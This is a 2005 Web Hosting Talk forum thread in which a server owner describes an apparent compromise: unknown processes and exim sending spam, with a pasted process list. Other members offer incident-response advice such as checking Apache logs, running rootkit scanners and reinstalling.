Web Hosting Talk

Web Hosting Talk (http://www.webhostingtalk.com/index.php)
-   Hosting Security and Technology (http://www.webhostingtalk.com/forumdisplay.php?f=5)
-   -   server compromised? (http://www.webhostingtalk.com/showthread.php?t=454075)


lkbryant 10-20-2005 05:02 PM

server compromised?
 
hi , i have like these following showing up in my ps,

- r0nin
- bindz
- bd

hmm, im running a rhel and it seems someone is using my server to send spam mails.

i have alot of load going to exim on my server, most seem to be targeting brazil...

any help or advice is greatly appreciated, asap.

thank you.

lkbryant 10-20-2005 05:29 PM

Here is a part of the exim processes

root 23186 0.1 0.3 9028 3296 ? S 13:29 0:00 /usr/sbin/exim -Mc 1ESh2s-00061w-HR
mail 23190 0.0 0.3 9028 3344 ? S 13:29 0:00 \_ /usr/sbin/exim -Mc 1ESh2s-00061w-HR
root 24288 0.1 0.3 9032 3296 ? S 13:31 0:00 /usr/sbin/exim -Mc 1ESh4H-0006Jh-OQ
mail 24290 0.0 0.3 9032 3332 ? S 13:31 0:00 \_ /usr/sbin/exim -Mc 1ESh4H-0006Jh-OQ
root 24359 0.5 0.3 9032 3292 ? S 13:31 0:00 /usr/sbin/exim -Mc 1ESh4N-0006Kn-4J
mail 24364 0.0 0.3 9044 3384 ? S 13:31 0:00 \_ /usr/sbin/exim -Mc 1ESh4N-0006Kn-4J
root 24676 0.6 0.3 8904 3264 ? S 13:31 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 2 1ESh4l-0006Po-FN
mail 24677 0.6 0.3 9032 3312 ? S 13:31 0:00 \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 2 1ESh4l-0006Po-FN
root 24760 0.5 0.3 8904 3264 ? S 13:31 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.tle.terra.com.br 200.154.55.2 3 1ESh18-0005fH-DO
mail 24764 0.1 0.3 9032 3308 ? S 13:31 0:00 \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.tle.terra.com.br 200.154.55.2 3 1ESh18-0005fH-D
root 24864 2.1 0.3 8908 3264 ? S 13:32 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx1.mail.yahoo.com 67.28.113.10 2 1ESIJC-0005hX-4k
mail 24867 0.1 0.3 9036 3320 ? S 13:32 0:00 \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx1.mail.yahoo.com 67.28.113.10 2 1ESIJC-0005hX-4k
root 24925 1.6 0.3 8900 3264 ? S 13:32 0:00 /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 6 1ESh4U-0006M4-0Y
mail 24929 0.0 0.3 9028 3312 ? S 13:32 0:00 \_ /usr/sbin/exim -MCS -MCP -MC remote_smtp mx.terra.com.br 200.154.55.2 6 1ESh4U-0006M4-0Y
root 24932 2.1 0.3 9024 3292 ? S 13:32 0:00 /usr/sbin/exim -Mc 1ESh54-0006U2-TZ
mail 24962 1.6 0.3 9024 3336 ? S 13:32 0:00 \_ /usr/sbin/exim -Mc 1ESh54-0006U2-TZ
mail 25020 14.0 0.3 9032 3348 ? S 13:32 0:00 /usr/sbin/exim -Mc 1ESh5B-0006VW-Qi
mail 25037 0.0 0.1 6584 1852 ? R 13:32 0:00 \_ /usr/sbin/exim -t -oem -oi -f <> -E1ESh5B-0006VW-Qi
root 25032 0.0 0.3 9028 3296 ? S 13:32 0:00 /usr/sbin/exim -Mc 1ESh5C-0006Vi-SB
mail 25036 0.0 0.3 9028 3336 ? R 13:32 0:00 \_ /usr/sbin/exim -Mc 1ESh5C-0006Vi-SB

hiryuu 10-20-2005 05:58 PM

Wipe the server. Hire an admin. This round is over.

omicronpersei8 10-20-2005 05:59 PM

Looks like a typical vulnerable web script comprimise, are all those processes running as the apache user?

If this is a shared/cpanel box, grep for these binary names in /usr/local/apache/domlogs and try to locate the virtual host they came in by. Which should lead you to the bug. (Most likely a php based forum or CMS)


This script will help you detect these type of attacks next time.
http://www.thunkers.net/~navs/public/nobody-knows.sh

Eleven2 Hosting 10-20-2005 06:33 PM

Check out this guide here: http://www.eth0.us/hacked

eth00 has some very good guides about everything!

sehe 10-21-2005 12:50 PM

run chkrootkit from http://www.chkrootkit.org/ and rkhunter from http://www.rootkit.nl/projects/rootkit_hunter.html
if its not a root compromise, there should not be a need for reinstall

eth00 10-21-2005 01:01 PM

Quote:

Originally posted by sehe
run chkrootkit from http://www.chkrootkit.org/ and rkhunter from http://www.rootkit.nl/projects/rootkit_hunter.html
if its not a root compromise, there should not be a need for reinstall

There are some rookits that cannot be detected by those methods. I would be VERY cautious since he has root owned files he did not create AND he changed root passwords but they are still being created. There is something weird going on and he will most likely need to take awhile to investigate it or just reimage.

lkbryant 10-21-2005 02:14 PM

how much would one charge to have a complete protection of my server from this point?

Eleven2 Hosting 10-21-2005 02:17 PM

I would recommend you contact someone like www.totalservesolutions.com I have used them and they are quite good!

sehe 10-21-2005 05:01 PM

Quote:

Originally posted by eth00
There are some rookits that cannot be detected by those methods.
won't object
Quote:


I would be VERY cautious since he has root owned files he did not create AND he changed root passwords but they are still being created.

you got more info about the incident? didnt see that part posted


All times are GMT -4. The time now is 04:35 AM.

Powered by vBulletin
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2014 DragonByte Technologies Ltd.
© WebHostingTalk, 1998 - 2014. All Rights Reserved.